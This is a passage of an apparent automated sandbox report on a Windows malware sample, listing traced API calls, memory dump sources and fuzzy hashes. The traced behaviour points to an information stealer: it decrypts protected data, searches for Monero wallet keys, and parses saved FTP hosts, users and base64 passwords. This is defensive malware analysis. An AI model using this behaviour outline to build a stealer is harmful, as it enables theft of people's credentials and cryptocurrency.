                        • Instruction Fuzzy Hash: FF11A4B4240209AFEB10CFA4DC95FAA77B9FB89B10F208058F9159B3D4C775A901DB50
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00880E00,00000000,?), ref: 008779B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 008779B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00880E00,00000000,?), ref: 008779C4
                        • wsprintfA.USER32 ref: 008779F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 6d042e62e9d68f9fa05de7085366b2c73a492a3f8f8d8847fb739fde4848bf48
                        • Instruction ID: f775cf0ffdaabd9cc9cd0959dd4bab4834ca33ae5565f36a08a482ae164f3d54
                        • Opcode Fuzzy Hash: 6d042e62e9d68f9fa05de7085366b2c73a492a3f8f8d8847fb739fde4848bf48
                        • Instruction Fuzzy Hash: 221115B2904219AACB14DFC9DD45BBEB7F8FB4DB11F10421AF605A2280E3395941CBB1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0116E4C8,00000000,?,00880E10,00000000,?,00000000,00000000), ref: 00877A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00877A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0116E4C8,00000000,?,00880E10,00000000,?,00000000,00000000,?), ref: 00877A7D
                        • wsprintfA.USER32 ref: 00877AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: 79125508ec75bac019dd6d8979735a9cce8ae2a5f1773cc3cbb51b3cd703bb8a
                        • Instruction ID: d28e746ef53af73a73496f24fd29f26f83de2accdcd52e4a968bd29c2d601814
                        • Opcode Fuzzy Hash: 79125508ec75bac019dd6d8979735a9cce8ae2a5f1773cc3cbb51b3cd703bb8a
                        • Instruction Fuzzy Hash: 0F117CB1945228EBEB20CF54DC49FA9B7B8FB05721F1046DAE91AA32D0C7785A40CF91
                        APIs
                        • CoCreateInstance.COMBASE(0087E118,00000000,00000001,0087E108,00000000), ref: 00873758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 008737B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 3e8a21b5f562d8040f93b1629276958d4e8599fd06896dfdb39d39adaeeaf037
                        • Instruction ID: ceea93911e2f653c3af64640764d1736216fe00dddb1f2bc1d54132554af2583
                        • Opcode Fuzzy Hash: 3e8a21b5f562d8040f93b1629276958d4e8599fd06896dfdb39d39adaeeaf037
                        • Instruction Fuzzy Hash: A941FB70A40A289FDB24DB58CC95B9BB7B4FB48702F4081D8E618E72D0D771AE85CF51
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00869B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00869BA3
                        • LocalFree.KERNEL32(?), ref: 00869BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 8cbbd8b792f288ca71d4e728435c7bcb6a74c4059f1ee5b0dd129d883f728ee6
                        • Instruction ID: 60999796f28a51cdb502bd943e9ce309b6390f3e35a396756951e050425fafa1
                        • Opcode Fuzzy Hash: 8cbbd8b792f288ca71d4e728435c7bcb6a74c4059f1ee5b0dd129d883f728ee6
                        • Instruction Fuzzy Hash: 9711CCB4A00209DFDB04DF94D985AAE77F9FF89300F104558E91597390D774AE11CFA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: <4x$Z.sm
                        • API String ID: 0-3651259717
                        • Opcode ID: 383fabea9398a5bd957e534171df4e130885795de81da6c31d6325eb211a13df
                        • Instruction ID: 0ad7a61f1c2476f794d371fbdee36065356f1ef4cea6d024f87061c231467628
                        • Opcode Fuzzy Hash: 383fabea9398a5bd957e534171df4e130885795de81da6c31d6325eb211a13df
                        • Instruction Fuzzy Hash: 16B217F3A0C204AFE3046E29EC8567AF7E9EF94760F16893DE6C483744EA3558058797
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: f#j/$qq?}
                        • API String ID: 0-2737718938
                        • Opcode ID: 46898fa27f32660b7bac63a27112f3826d531c422b7e1dae10e8c15dc43ab1e7
                        • Instruction ID: 613d20a94f9531bec88ac594689c1f6a609d48fefcff346350ad80b71b5ede7e
                        • Opcode Fuzzy Hash: 46898fa27f32660b7bac63a27112f3826d531c422b7e1dae10e8c15dc43ab1e7
                        • Instruction Fuzzy Hash: 2F5123B3A087048FE3106E29CC8537ABBD6EFD4711F2B853DD6C887784EA3959068746
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008815B8,00880D96), ref: 0086F71E
                        • StrCmpCA.SHLWAPI(?,008815BC), ref: 0086F76F
                        • StrCmpCA.SHLWAPI(?,008815C0), ref: 0086F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0086FAC3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 84c4c0165d4302b2349ea7859549a4bdb80ccc2ee8b196465ca76ef865a517b7
                        • Instruction ID: e4d0a8edf3e2105160cd3fc81fb1d68c8c242e9db9be55c3c0f285345674e26d
                        • Opcode Fuzzy Hash: 84c4c0165d4302b2349ea7859549a4bdb80ccc2ee8b196465ca76ef865a517b7
                        • Instruction Fuzzy Hash: 8E1163318001599BDB18EBA4DC959EE7378FB50300F4082A5A52ED6096EF306B4ACB53
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: rq=
                        • API String ID: 0-3145165390
                        • Opcode ID: a0eca6a029677fc40a0e39b8a8d203a5d0176beecc3a176bae95ff33583d9d7a
                        • Instruction ID: 7ae52fc82c7480d5e288126db2072ea2e4f715df2fce8cb9ac5f7ef27547a7f2
                        • Opcode Fuzzy Hash: a0eca6a029677fc40a0e39b8a8d203a5d0176beecc3a176bae95ff33583d9d7a
                        • Instruction Fuzzy Hash: F27114B39087149FE314AE2DDC4576AFBE5EB90720F1A8A2DE9C8D7784E93548418783
                        Strings
                        Similarity
                        • API ID:
                        • String ID: 8+
                        • API String ID: 0-2599851556
                        • Opcode ID: 8335cf130ff19245e35ef1d8efb864d1148381becf150896393c34c23b75d8a6
                        • Instruction ID: a1f1ca8f73863aeef3c908205f591c16339b68421a2368eec420e5b170f63adc
                        • Opcode Fuzzy Hash: 8335cf130ff19245e35ef1d8efb864d1148381becf150896393c34c23b75d8a6
                        • Instruction Fuzzy Hash: 3A71F8F3A086009FE318AF19DC8577AB7D5EF94320F2A853DEAC497740EA359D418786
                        Strings
                        Similarity
                        • API ID:
                        • String ID: nQ|H
                        • API String ID: 0-1817109747
                        • Opcode ID: 0807b5043632ffdbf47e78b7070f30c93316d50f971b6e459bc61cd8b3e1d94c
                        • Instruction ID: 9211eb891a713c94a45e3d1d26b51ea6974bc8e11cc8ef32836f3b94021de31c
                        • Opcode Fuzzy Hash: 0807b5043632ffdbf47e78b7070f30c93316d50f971b6e459bc61cd8b3e1d94c
                        • Instruction Fuzzy Hash: 08516CF3A183109BE3046A28DC4577BB7D5EBA4760F1A853DEAD8D7780E9398C018786
                        Strings
                        Similarity
                        • API ID:
                        • String ID: ~f?_
                        • API String ID: 0-1173674360
                        • Opcode ID: e188442e1fff628f0501e18faf68ef5e7514f6e6f1311a6676b61bdc8d8859e1
                        • Instruction ID: 7201eca0de061151e42f8ecf61a1c636abaaa01f5f904833fccaef82514560f0
                        • Opcode Fuzzy Hash: e188442e1fff628f0501e18faf68ef5e7514f6e6f1311a6676b61bdc8d8859e1
                        • Instruction Fuzzy Hash: 26516AF3A186148BE748AE29DC84377B7E1EFC4310F1A453DDB8997384DA35684587CA
                        Strings
                        Similarity
                        • API ID:
                        • String ID: AL?{
                        • API String ID: 0-3831830120
                        • Opcode ID: 7d0f28a46275e7f13dac177772a60ac29fd3c4be5db38a7f6e956b911cbe8f3e
                        • Instruction ID: 8422aead84ce08c6d21407de967a8ca65bc5b7fdfccb886e0b5ecf68966eb86b
                        • Opcode Fuzzy Hash: 7d0f28a46275e7f13dac177772a60ac29fd3c4be5db38a7f6e956b911cbe8f3e
                        • Instruction Fuzzy Hash: 4A4159B7B182101FF31C9969EC69777668AD7D4720F2E423EEB86D7380EC695C0542A0
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 41e7a49992ca134b45417d546cc977d6d36e2343b4a970ba60404fde261d00f3
                        • Instruction ID: 88fb65fc6b311437211bc144a9a416195edf293fc620468e96f9d1d57257005d
                        • Opcode Fuzzy Hash: 41e7a49992ca134b45417d546cc977d6d36e2343b4a970ba60404fde261d00f3
                        • Instruction Fuzzy Hash: 5E41BBF3D492385BD318293DFC057B6B7869B90661F1A823EDE8197B88FE78490543C4
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a405d441641221bd24b99fdc77f4711c9e66797cf24a95793de6ffe6696b4d62
                        • Instruction ID: e826a458654f7ed8fd143078368618dc4e6280badfcef3d73419d8b89cf67ab0
                        • Opcode Fuzzy Hash: a405d441641221bd24b99fdc77f4711c9e66797cf24a95793de6ffe6696b4d62
                        • Instruction Fuzzy Hash: 8B419CF3D082109BE3142929DC847BBB7E9DBD4320F3B423DEB9493B80E939580681C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc6c11c9278f72a7f0ccabc0dcf175ee7f0917bdb09b8ababe15df75b23dd898
                        • Instruction ID: 1aa001aaeae6ac95d22617e0fce99a85affb31670f0e42e13791ceebef7750fe
                        • Opcode Fuzzy Hash: fc6c11c9278f72a7f0ccabc0dcf175ee7f0917bdb09b8ababe15df75b23dd898
                        • Instruction Fuzzy Hash: D9313CB791CA30DFD2095A15FC40D7AF7D5DBA4328F22462ED5C787648E571CC4096E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 557dfc84bf4cfcfd0a6abc9b4808661af97507bad5f6b5925162e0d3cac6b611
                        • Instruction ID: eca897f238d0200a065beda0fd914a59f2d9b513101134da026121fbae07afb2
                        • Opcode Fuzzy Hash: 557dfc84bf4cfcfd0a6abc9b4808661af97507bad5f6b5925162e0d3cac6b611
                        • Instruction Fuzzy Hash: D741A2B640D200EBD305BF15E9455BEF7E2EF94720F26482DE5D283604DB349881DBA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 631381a2df7b063ab2d4b7acef2521338eb493270d901e7ced98c09728a7b296
                        • Instruction ID: bb5a162e7003f4e9a0397564d477533bd2af6a4311bd7660d995dcffb7ec9378
                        • Opcode Fuzzy Hash: 631381a2df7b063ab2d4b7acef2521338eb493270d901e7ced98c09728a7b296
                        • Instruction Fuzzy Hash: 7631F2B211C7009FE709AF29E8866BEFBE4FF58320F56092DE2D582640DB755480CB57
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e30ab4fc675421d461439280b88d601de14afff517015e20fe7289bcc56c02d7
                        • Instruction ID: 5495cdc9587f20051e9f069949eb45c60cdfbcaeeeba32b3943d90a1b3c00806
                        • Opcode Fuzzy Hash: e30ab4fc675421d461439280b88d601de14afff517015e20fe7289bcc56c02d7
                        • Instruction Fuzzy Hash: 25210FF7E086205BF300AD2DEC847ABB795ABD4320F2B4439DB98A7381E5795C0582C5
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 00878DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00878E0B
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008699EC
                          • Part of subcall function 008699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00869A11
                          • Part of subcall function 008699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00869A31
                          • Part of subcall function 008699C0: ReadFile.KERNEL32(000000FF,?,00000000,0086148F,00000000), ref: 00869A5A
                          • Part of subcall function 008699C0: LocalFree.KERNEL32(0086148F), ref: 00869A90
                          • Part of subcall function 008699C0: CloseHandle.KERNEL32(000000FF), ref: 00869A9A
                          • Part of subcall function 00878E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00878E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00880DBA,00880DB7,00880DB6,00880DB3), ref: 00870362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00870369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00870385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 00870393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 008703CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 008703DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00870419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 00870427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00870463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 00870475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 00870502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 0087051A
